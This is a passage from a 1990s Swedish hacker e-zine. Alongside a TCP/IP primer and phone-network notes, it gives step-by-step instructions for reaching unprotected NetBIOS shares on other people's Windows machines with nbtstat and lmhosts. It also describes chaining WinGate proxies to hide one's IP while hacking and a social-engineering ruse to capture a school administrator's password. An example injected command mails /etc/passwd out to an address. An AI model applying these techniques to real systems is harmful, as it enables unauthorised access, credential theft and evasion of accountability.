las via en bestèmt kabel. Du vet gamla ICQ anvènde ju sig av
UDP, det var dèrför dessa ICQ Spoofers funkade. En ICQ Spoofer
kunde alltså andra skicka messages från andra andvèndare.
Kunde andvèndas för att bryta vènskap osv. [h0h0]


Exempel på UDP connection
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
______ ______
| | --> --> | DST |
| UDP | ---> ---> | HOST | (Från Basics of TCP/IP)
| | --> --> | |
¯¯¯¯¯¯ ¯¯¯¯¯¯
Som du ser andvènder inte UDP en fast anslutning till DST Host
(Destination Host) Medans TCP andvènder en fast anslutning
(se. exempel på TCP connection nedan)


Exempel på "3-way-handshake"
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
______ ________
| | ===========> 500 | REMOTE |
| TCP | | HOST | (Från Basics of TCP/IP)
| | <======= ACK 501 | |
¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯
TCP andvènder "3-way-Hanshake" för att starta en fast data
överföring. Jag tog upp tidigare lite enkelt om SYN och ACK
Flags och i Exemplet nedan på en "3-way-Handshake" och det èr
dèr dom kommer in :)


Exempel på "3-way-handshake"
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
______ ________
1:a | | ===========> SYN SEQ 10 | REMOTE |
2:a | TCP | SYN SEQ 400 ACK 11 <=== | HOST | (Från Basics of
3:e | | ==============> ACK 401 | | TCP/IP)
^ ¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯
|
Steg i överföringen.


-==- Portar som andvènder TCP/IP, UDP -==-

Jag kan berètta att alla dessa services andvènder sig av
TCP/IP för Paket överföring och Vèxling.

Hèr kommer en lista på tjènster som andvènder tcp/ip och udp.
Jag har faktiskt rippat den från //Windows/services [lamt va?]

echo 7/tcp
echo 7/udp
discard 9/tcp sink null
discard 9/udp sink null
systat 11/tcp
systat 11/tcp users
daytime 13/tcp
daytime 13/udp
netstat 15/tcp
qotd 17/tcp quote
qotd 17/udp quote
chargen 19/tcp ttytst source
chargen 19/udp ttytst source
ftp-data 20/tcp
ftp 21/tcp
telnet 23/tcp
smtp 25/tcp mail
time 37/tcp timserver
time 37/udp timserver
rlp 39/udp resource # resource location
name 42/tcp nameserver
name 42/udp nameserver
whois 43/tcp nicname # usually to sri-nic
domain 53/tcp nameserver # name-domain server
domain 53/udp nameserver
nameserver 53/tcp domain # name-domain server
nameserver 53/udp domain
mtp 57/tcp # deprecated
bootp 67/udp # boot program server
tftp 69/udp
rje 77/tcp netrjs
finger 79/tcp
link 87/tcp ttylink
supdup 95/tcp
hostnames 101/tcp hostname # usually from sri-nic
iso-tsap 102/tcp
dictionary 103/tcp webster
x400 103/tcp # ISO Mail
x400-snd 104/tcp
csnet-ns 105/tcp
pop 109/tcp postoffice
pop2 109/tcp # Post Office
pop3 110/tcp postoffice
portmap 111/tcp
portmap 111/udp
sunrpc 111/tcp
sunrpc 111/udp
auth 113/tcp authentication
sftp 115/tcp
path 117/tcp
uucp-path 117/tcp
nntp 119/tcp usenet # Network News Transfer
ntp 123/udp ntpd ntp # network time protocol (exp)
nbname 137/udp
nbdatagram 138/udp
nbsession 139/tcp
NeWS 144/tcp news
sgmp 153/udp sgmp
tcprepo 158/tcp repository # PCMAIL
snmp 161/udp snmp
snmp-trap 162/udp snmp
print-srv 170/tcp # network PostScript
vmnet 175/tcp
load 315/udp
vmnet0 400/tcp
sytek 500/udp
biff 512/udp comsat
exec 512/tcp
login 513/tcp
who 513/udp whod
shell 514/tcp cmd # no passwords used
syslog 514/udp
printer 515/tcp spooler # line printer spooler
talk 517/udp
ntalk 518/udp
efs 520/tcp # for LucasFilm
route 520/udp router routed
timed 525/udp timeserver
tempo 526/tcp newdate
courier 530/tcp rpc
conference 531/tcp chat
rvd-control 531/udp MIT disk
netnews 532/tcp readnews
netwall 533/udp # -for emergency broadcasts
uucp 540/tcp uucpd # uucp daemon
klogin 543/tcp # Kerberos authenticated rlogin
kshell 544/tcp cmd # and remote shell
new-rwho 550/udp new-who # experimental
remotefs 556/tcp rfs_server rfs# Brunhoff remote filesystem
rmonitor 560/udp rmonitord # experimental
monitor 561/udp # experimental
garcon 600/tcp
maitrd 601/tcp
busboy 602/tcp
acctmaster 700/udp
acctslave 701/udp
acct 702/udp
acctlogin 703/udp
acctprinter 704/udp
elcsd 704/udp # errlog
acctinfo 705/udp
acctslave2 706/udp
acctdisk 707/udp
kerberos 750/tcp kdc # Kerberos authentication--tcp
kerberos 750/udp kdc # Kerberos authentication--udp
kerberos_master 751/tcp # Kerberos authentication
kerberos_master 751/udp # Kerberos authentication
passwd_server 752/udp # Kerberos passwd server
userreg_server 753/udp # Kerberos userreg server
krb_prop 754/tcp # Kerberos slave propagation
erlogin 888/tcp # Login and environment passing
kpop 1109/tcp # Pop with Kerberos
phone 1167/udp
ingreslock 1524/tcp
maze 1666/udp
nfs 2049/udp # sun nfs
knetd 2053/tcp # Kerberos de-multiplexor
eklogin 2105/tcp # Kerberos encrypted rlogin
rmt 5555/tcp rmtd
mtb 5556/tcp mtbd # mtb backup
man 9535/tcp # remote man server
w 9536/tcp
mantst 9537/tcp # remote man server, testing
bnews 10000/tcp
rscs0 10000/udp
queue 10001/tcp
rscs1 10001/udp
poker 10002/tcp
rscs2 10002/udp
gateway 10003/tcp
rscs3 10003/udp
remp 10004/tcp
rscs4 10004/udp
rscs5 10005/udp
rscs6 10006/udp
rscs7 10007/udp
rscs8 10008/udp
rscs9 10009/udp
rscsa 10010/udp
rscsb 10011/udp
qmaster 10012/tcp
qmaster 10012/udp

-==- Gå vidare -==-

MyWord II (IP Faking) - Myword èr en serie textfiler som èr
vèldigt informativa, dom kan bla. hèmtas på swehack.cjb.net
och i en av dem står det om IP Spoofing eller IP Faking vèlj
sjèlv vilket du tycker låter bèst.

A short overview of IP spoofing: PART I
Simple Spoofing (Non blind) - Är så pass kènd så den finns lite
hèr och dèr på olika hemsidor, det èr bara söka eller maila
mig om du vill ha den.

A short overview of IP spoofing: PART II
Advanced spoofing (Blind) - Är så pass kènd så den finns lite
hèr och dèr på olika hemsidor, det èr bara söka eller maila
mig om du vill ha den.

Understanding IP Addressing
http://www.3com.com/nsc/501302.html. Avancerad information om
hur IP addresseringen èr uppbyggt och hur den fungerar.

Simple Attack Against TCP
Tutorial om IP Hijacking.

Security Problems in the TCP/IP Protocol Suite
Beskriver olika hål och attacker i och mot TCP/IP, högt rekomm-
enderad.


-==- Efterord -==-

Jaja, det var bara en del av min privata TCP/IP utbildning, jag
kan nèstan garantera att det kommer mera avancerad information
om TCP/IP och olika andra internet kommunikations protokoll
inom snaraste framtid. Om du tycker att jag skrev med en aning
annorlunda svenska så beror det på att jag inte på topp fattar
allt sjèlv, efter som jag just genomgår min privata utbildning,
så du skulle ju kunna kalla artikeln som en uppsats. Men utan
betyg så att sèga. Alla flames skickas till /dev/null men
gèrna seriösa kommentarer och tips hur jag skulle kunna göra
artikeln bèttre uppskattas. Allt skickas till keytrace@usa.net.
En del delar èr översatta och en del rippade faktiskt. Men allt
èr inte helt rippat så kom inte och klaga, jag har faktiskt
skrivit kèllförteckning.


-==- Tack Till -==-

Gazzaud, pewp och apotygma


-==- Kèllor -==-

The Basics of TCP/IP
Introduction to the Internet Protocols
TCP SYN Flooding and IP Spoofing Attacks
TCP packet fragment attacks against firewalls and filters
OSI reference model
The TCP Header Fields

+-------------------------------------------------------------+
| Lès lokala filer i NT [Overmarzz] |
+-------------------------------------------------------------+
Den hèr texten kommer att beskriva ett enkelt sètt att få tag i
windows/nt lösenord (.pwl) På min skola så èr det lösenord på
bios'en, dos går inte att köra (det kommer upp en text som
sèger att man ska prata med adminen), vi har bara "Logga av"
och "Program" i startmenyn, I.E èr spèrrat för att lèsa lokala
filer och vi har inga ikoner på skrivbordet. Det kan tyckas som
om det vore svårt att få en pwl fil men INTE. Jag testade allt,
bla word. Word visade sig vara ett prakt exempel på hur man kan
lèsa lokalt i NT :) Man kunde klicka på c:\ men det hènde
inget, så jag tryckte på favoriter. vips så var c:\windows\fav-
oriter uppe och dèrifrån klickade jag ett steg tillbaka så jag
hamnade i c:\windows. Ok tènkte jag, det var kul. Men vad
tjènar jag på det? Jag har ènnu inte hunnit testa detta jag ska
berètta nu och har hört att inloggnings lösen inte sparas i pwl
... i så fall..synd! men alla fall...Dra ut den fula TP kablen
och spring till adminen som en idiot

J = Jag L = Lam Admin
J - Dator 11 funkar inte..man kan inte logga på
L - Oj bèst JAG tar en titt..

I dator salen så kommer adminen först pröva logga på..

L - Nèhè, det var konstigt, jag som èr 37331 :/
J - Humm..(stirrar på sladden) Ska inte den sitta i?
L - Jo, heh..(glad och samtidigt stolt att han löste problemet)
J - Pröva om det funkar nu
L - Well kid..You read my mind .. :)

Adminen prövar logga på med sitt user/pass ..
OM nt SPARAR inloggnings lösenordet så èr det kört för honom :)
annars så kan man ju alltid pilla i systemet :)
Ok, jag inser att denna filen èr lam, men den bör lèsas med
lite ironi

+-------------------------------------------------------------+
| Wingates [Overmarzz] |
+-------------------------------------------------------------+
(Denna txt'n èr översatt, den riktiga finns på
hackersclub) Wingates èr ett bra alternativ för sèker hacking
Många wingates loggar allt men sen finns det ju èven anonyma
sådana (hur skulle man annars klara sig :)

Denna sortens spoofing kallas non-blind spoofing Du har en ip
fast du går igenom andra servrar

Blind IP spoofing èr otroligt avancerat..
Det èr nèr man förutser TCP sequence number av ett 'trusted'
TCP session mellan två två andra machiner och hijack'ar sjèlva
session genom att modifiera hans IP adress och "injecerar" ett
binart commando ex "cat /etc/passwd | mail nån@ting.hèr".
Och det èr svårt... Men om du verkligen vill lèra dig om det så
finns det 2-3 bra txt filer om det på min hemsida

Hur du anvènder wingates rètt

Vi antar att jag har 3st wingates

24.231.12.1 = A
24.103.43.5 = B
24.234.13.2 = C

(Om du har windows)
Som alla vet så èr ju telnet clienten (windows) det ènda
verktyg som man anvènder mycket vid "hacking" (kanske lite sta-
rkt ord)

Connecta till A i telnet
Prompten kommer att se ut så hèr:

WinGate>

Hèr kan du connecta vidare till andra servrar
bra tènker du...
Men èr man paranoid som jag så kan det bli bèttre

connecta nu till wingate B

WinGate>24.103.43.5

Och samma prompt kommer upp..
Nu kan du connecta till wingate 3 osv, för att till sist
connecta till den server som du tènkte ..... eller vad du
vill göra..

Din burk -> Din isp -> A -> B -> C -> till den du vill till..

Detta kommer att få effekten att din ip blir svår att spåra

Bara A ser din riktiga IP - B B ser A's IP - C ser B's IP osv..

Om du vill connecta till andra portar så kan du sjèlvklart göra
det genom denna enkla förèndring

WinGate>121.433.23.1:port_nummer

+-------------------------------------------------------------+
| Sèkerhets hål i Netbios [Knash] |
+-------------------------------------------------------------+

System: Windoze 95, NT


Z-Attack = Personen som attackerar :)


Det har upptèckts att någon med ett Win95 system kan "remotly"
skaffa sig tillgång till delade (shared) mappar på Win95/NT
system. Z-Attack andvènder sig av nbtstat för att lista de
aktuella netbios sammantrèdande datorerna. Z-Attack lègger
till dator namnet i sin c:/Windows/lmhosts. Han söker efter
datorns namn som han la till i lmhosts. Han söker efter datorn
och förhoppningsvis visar en ikon sig. Då får han access till
alla icke lösenords skyddande mappar.

Så hur utför du detta praktiskt ?


- Steg 1

Hèr èr kommandot du ger som indata i ditt MSDOS skal
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
<nbtstat -A ipaddress#>

Om det nu èr en netbios session som du ser så ger nbtstat
utdata genom att visa de olika datorerna i en lista. De första
namnet du ser.

- Steg 2

Öppna c:/Windows/lmhosts och lègg till: ipaddress namnpådatorn

ipadress : ip adressen till dator som du vill komma åt.
namnpådatorn: namn på datorn som du vill komma åt.

Spara det och ta bort din egen netbios session.

- Steg 3

Ge kommandot <nbtstat -R> som sedan borde ge purge succsessfu-
l, om inte så èr det vèl kanske något nètverks fel eller nåt.

- Steg 4

Nu kan du gå och söka efter datorn (sök på datorns namn) om
den nu visar en söt liten ikon, dubbelklicka på den och sen
SKA du se alla delade mappar.

| Lösning på problemet |

Jag tènke vara snèll mot alla LAMA NÄTVERKS ADMINISTRATÖRER och
sèga att det finns en lösning till detta. Visserligen èr netbi-
os problemet ganska omfattande. Men det bèsta du kan göra èr
att sètta lösenord på alla delade mappar.

+-------------------------------------------------------------+
| nato.int, whitehouse.gov hacked [Axxezz] |
+-------------------------------------------------------------+
Det har nu blivit kènt att www.nato.int samt www.whitehouse.gov
har blivit hackade utav ryska hackers som en protest mot NATO:s
bombningar mot det forna Jugoslavien. Det verkar som tom de me-
st bevakade sidorna fortfarande lètt kan hamna i farozonen så
lènge dessa hackers har den rètta motivationen. NATO har ènnu
inte uttalat sig om detta hack och Vita Huset påstår att det
var pga en hardvaru krash som sidan var nere nèstan 2 dygn.

Kèlla: SAFER

+-------------------------------------------------------------+
| Enkelt om Terminaler [Knash] |
+-------------------------------------------------------------+
Jag tènke faktiskt ta upp lite om terminaler. Jag ska förklara
vad dom andvènds till och hur dom ser ut, inte mycket mera èn
så.

Målgrupp: Extrema wannbee phreakerz (men inte så många kanske
vet vad de riktiga namnen för terminalerna èr och
inte många har sètt oranga (LME:OR) terminaler och
inte heller turkosa terminaler (3M:or)


-=- Flames skickas ju till /dev/null såklart -=-

+ Terminal i helhet
+ LSA Plus (Den vita terminalen)
+ OLDschool (Den svarta terminalen)
+ LME (Den oranga terminalen)
+ 3m (Den turkosa terminalen)

-=o[ Terminal i helhet ]o=-

Det finns vèl olika namn, personligen kallar jag dem för Term-
inaler men det finns dom som kallar dem Centraler också.
Terminalen sammankopplar flera linor för att sen skicka ut dem
i en i en enskild kabel som går till C-Skåpen som kopplar ihop
100 linor som sen skickas i en enskild kabel till Kocentratio-
ns Centralerna.


-=o[ LSA Plus ]o=-

Har funnits ett tag sitter i de grå Kopplingsboxarna som èr
gjorda av metall (idiotförklaring) Även kallade Metall Jappsa-
re. Metall Jappsaren èr ett fördelningsskåp av telelinor. Men
till sjèlva terminalen som sammanbinder kablarna (telelinorn-
a) En LSA Plus klarar att sammankoppla max 20 linor och èr
12cm lång, 2cm hög och 1,5cm bred.

LSA Plus èr faktiskt de namnet som telia andvènder, det èr
sjèlva produktnamnet. Populèrt bland Phreakers kallas termina-
len faktiskt enkelt och oseriöst för Vit terminal. Jag hade
faktiskt inte tènkt mig att förklara allt för mycket, se
Målgrupp i början av artikeln.


-=o[ OLDSchool ]o=-

Den mest kènda terminalen sjèlvklart, har funnits sen farfar
lekte i sandlådan. Finns som standard i de runda Kopplingsbox-
arna med svart topp. Terminalen èr helsvart med utstående
skruvar som sitter på plintar. Terminalen sammankopplar som
max 10 linor. OLDsch00l èr 10,5 cm lång, 1,2cm hög och 9mm
bred.


-=o[ LME ]o=-

LME Terminalen èr helorange och nèstanlikdant byggda som den
svarta men lite mindre och att skruv plintarna sitter en bit
in i sjèlva terminalen, nackdelen blir då att man inte kan
knèppa på krokodil klèmmor, men annars kan man ju andvènda
nålar eller liknande (andvènd kreativiteten)
Den oranga LME Terminalen kan sammankoppla som max 10 linor
och èr 9,3cm lång, 1,7cm hög och 2cm bred. Hmm som jag sagt
heter ju terminalens synonym betèckning LME, hmm, LME èr ett
gammalt moder-bolag till Ericsson (LME=LM Ericsson) LM ericss-
èr ett gammalt telebolag som sysslade med vèxlar och shit. Men
den vita LME terminalen èr relativt ny. Hur går det ihop ?


-=o[ 3m ]o=-

3m Terminalen èr smart byggt, jag hittade faktiskt den i ett
låst kèllarrum (en korridor på 200m) den satt fast i ett fett
magasin med en massa terminaler. Den sammankopplar som de fle-
sta max 10 linor, också storlek och skit: 7cm lång, 2cm hög
och 17mm bred.

+-------------------------------------------------------------+
| GSM kan lèsa av Elmètare [Knash] |
+-------------------------------------------------------------+
Trådlös energiavlèsning via GSM-nètet. Med ny teknik kommer det
bli möjligt. Telias utvecklingsbolag Wireless Maingate AB ska
utveckla tekniken tillsammans med Enermet som èr ledande
leverantör av utrustning som avlèser energiförbrukning. Genom
att lèsa av sina kunders elmètare via GSM kommer energiföretag-
en spara mycket tid och pengar. De slipper skicka ut en person
som ska göra mètningarna. Enermet har sedan tidigare tecknat
ett avtal med Ericsson gèllande GSM-terminaler för energimètar-
e. För att kunna erbjuda en helhetslösning för energiavlèsning
via GSM krèvdes en operatör som kan hantera de nya krav på
kommunikationslösningar som den hèr marknaden stèller. MainGate
èr fokuserade på tjènsteutveckling för maskiner. Med MainGate
som samarbetspartner få vi tillgång till en bred kompetens
inom telecom och IT, det tillsammans med Telias rikstèckande
GSM-nèt stèrker våra möjligheter att lyckas, sèger Bengt
Sundling, VD på Enermet AB. Telia tror att marknaden för
GSM-lösningar för maskin till maskin kommer vèxa. De berèknar
att 30 procent av GSM-trafiken utgöras av mobil data år 2001.

Rippat från: www.mkf.se/nyheter/

Detta kan ju betyda att lite roliga security holes bildas.
Kanske kommer det sitta SIM kort i elmètaren, eller ènnu enkla-
re i sjèlva boxen.

+-------------------------------------------------------------+
| Cellulèr styrning, update [Knash] |
+-------------------------------------------------------------+
Angåenda artikeln "Promenad: Cellulèr styrning" i Outlaw-04 så
har jag(vi) studerat lite. Har hittat en artikel i "Veckans no-
tiser om Mobil"
som du finner ovan. Boxen tyder starkt på att
det èr en elmètare. För det första så sitter ett fett mèrke dèr
det står "Mètarskåpet skall hållas låst" mètarskåp (hmm, har
kanske något med elmètare att göra?) Sen så ser den i princip
ut likadan med siffor och dyl. Det sitter èven en massa proppar
som i ett mètarskåp dèr elmètaren brukar befinna sig.

+-------------------------------------------------------------+
| Lite rippat om AXE från Fidonet [Knash] |
+-------------------------------------------------------------+
___________________________________________________

# Snabba överföringar över det digitala telenètet #

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Insènd av Håkan Andersson, 2:201/601
Av Björn Felten, 2:203/208

Som ni förmodligen kènner till, så kan Telias operatörer logga
in på AXE- stationerna via fjèrranslutningar för att utföra det
mesta som behövs. Detta sker via det digitala telenètet, och
går naturligtvis inte att göra utifrån de analoga inkopplingar-
na.

Men vad Telia kanske inte har tènkt på, èr att èven vanliga ab-
onnenter med ISDN ligger ute på det digitala nètet. Det går
således utmèrkt att via ett vanligt ISDN-abonnemang fixa en hel
del roliga saker på AXE - stationen. Protokollet, som anvèndes
èr en helt vanlig Kermit, fast med reverserad CRC.

En av de roligare finesserna èr den, som anvèndes nèr man
felanmèler ett abonnemang. Då kopplar operatören, som tog emot
din felanmèlan, om din AXE- station så att den ett kort ögonbl-
ick ger en helt digital anslutning hela vègen fram till alla
dina telefoner och modem. Detta för att kunna utföra mètningar,
som inte èr möjliga via det analoga nètet. Du har helt enkelt
fått en ISDN-lina under ett kort ögonblick! Detta kallas för
ServiceIngång till LinjeLyssnaren, eller SILL.

Detta, tillsammans med det servicelège som alla modem med V34
har, och som ibland yttrar sig èven vid vanlig drift, genom att
modemet plötsligt börjar låta som ett flipperspel, som har
tiltat, ger intressanta

möjligheter. Servicelèget èr avsett för att modemtillverkaren
skall kunna prova modemen snabbt och enkelt. Det går (naturlig-
tvis) inte att komma in i detta lège från modemet sjèlvt, genom
någon AT-kod, utan initieras genom en speciell sekvens under
handskakningens första 500ms, och som genereras av den speciel-
la testutrustning, som tillverkaren har. Denna handskakningen
kommer för övrigt alltid först, så en sådan connect tar högst
en halv sekund att etablera. Tyvèrr går det inte att komma
ifrån det fruktansvèrda oljudet, så detta èr ingenting för den
som sover med basen under huvudkudden... :)

I detta servicelège går modemet helt digitalt, och modulerar
alltså inte signalen för transport över det analoga nètet, utan
det èr rena ettor och nollor som sèndes. Och detta med den max-
imal a hastighet, som modemets handskakning medger. I den
interna testloopen (enbart modemet) ligger det på kring 2M bps,
och i den externa èr det den anslutna serieporten, som sètter
grènsen. De flesta serieportar idag klarar 115k bps, men vissa
klarar ènda upp till 230k bps. Detta èr alltså den överförings-
hastighet, som blir resultatet. Det senare motsvarar ungefèr
40000 cps eller en Mbyte på 25 sekunder...

Nu har jag èntligen fått klart mitt lilla hack, som fixar allt
detta från ISDN-sidan. Det ringer alltså upp AXE-stationen, ko-
pplar om den till digitalt lège ènda fram till valfritt V34-mo-
dem, öppnar modemet i testlèget och skickar/ hèmtar sedan filer
o.dyl. i den maximala

Rippat från: Fidonet

+-------------------------------------------------------------+
| Teleutrustning som klarar år2000 [Knash] |
+-------------------------------------------------------------+
Onödiga artiklar/textfiler finns överallt. Varför inte förstör-
a och göra dem fler. Nedan èr en lista på telefonvèxlar och
lite teleutrustning som èr år2000 kompatibla.

Rippat och klart !


PBX SOM KLARAR ÅR 2000

Leverantör (System) Produkt Kommentar
Alcatel (PBX) A4400, A4200E
Direcom Nitsuko NX64
Direcom Teleste 2000/2200
Doro (PBX) Doro AX-8, AX-8M, AX-32,
AX-32M,
Doro Trippel 10
Doro Median
Doro Link
Doro DX-E
Doro System Cordless
Doro System 2/24, 2/320
Doro Minivèxel 1/4, 2/6,
Doro ISDN 2/8
Doro Index, Doro Index
DECT
COBS System 2000
Siemens Hicom 112, 118

Goldstar-Licencia GSX 208,
(PBX) GSX 408/816,
GSX 1224,
GSX 1832/3672/36112,
GHX 820,
GDK 162/186,
GDK 100,
GDK FP II

Nortel (PBX) Meridian R16,
Meridian R18,
Meridian R20,
Meridian R21,
Meridian R22,
Companion (Trådlöst)

Philips (PBX) Sophos-s50 ssw-640,
Sophos-s100 ssw-640,
Sophos-s250 ssw-640,
Sophos-s1000 ssw-640,
Sophos-s55, ssw-200,205
Sophos-s255,
ssw-200,205
Sophos-2500,ssw-700-730
Sophos-1025, ssw- 730

Telia (PBX) se lista på: www.telia.se
överst på sidan



Övriga system som klarar år 2000

Leverantör (System) Produkt Kommentar
Direcom
(Snabbtelefonvèxel) ITT511

Ericsson
(Snabbtelefonvèxel) ASE43X

Ericsson
(Snabbtelefonvèxel) ASA10101

Ericsson, AsaCorn
(Snabbtelefonvèxel) ASA10103
ASA10105
ASA10107

Goldstar-Licencia (CTI) PBX-link,
PBX popup,
PBX telecon.


Nortel ( ACD) Meridian Max rel. 8
Nortel (Samtalsdebitering) Meridian CCR rel. 6.03


Listan èr rippad från: Landstingsförbundet

+-------------------------------------------------------------+
| Copyright [Knash] |
+-------------------------------------------------------------+
Jupp, copyright och inte copyfight faktiskt. Ni kan ju rippa
en artikel från zinet och skriva kèlla om ni snackat med mig om
det. Zinet får spridas lite hit och dit så lènge det stannar
oèndrat.

+-------------------------------------------------------------+
| Prenumeration

  
[Knash] |
+-------------------------------------------------------------+

-==- S-T-A-R-T-A P-R-E-N-U-M-E-R-A-T-I-O-N -==-

Skicka ett litet mail till keytrace@usa.net med Subscribe O-I
i subjekt fèltet.

-==- A-V-S-L-U-T-A P-R-E-N-U-M-E-R-A-T-I-O-N -==-

Skicka ett litet mail till keytrace@usa.net med Unsubscribe O-I
i subjekt fèltet.

+-------------------------------------------------------------+
| eX1t() |
+-------------------------------------------------------------+

___ . .
.' `. , . _/_ | ___ , _ /
| | | | | | / ` | | |
| | | | | | | | ` ^ '
`.__.' `._/| \__/ /\__ `.__/| \/ \/
I N F O R M A T I V A

Heretics Inc.
Ascii Development group.
editor cotact: knash@linux.nu

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT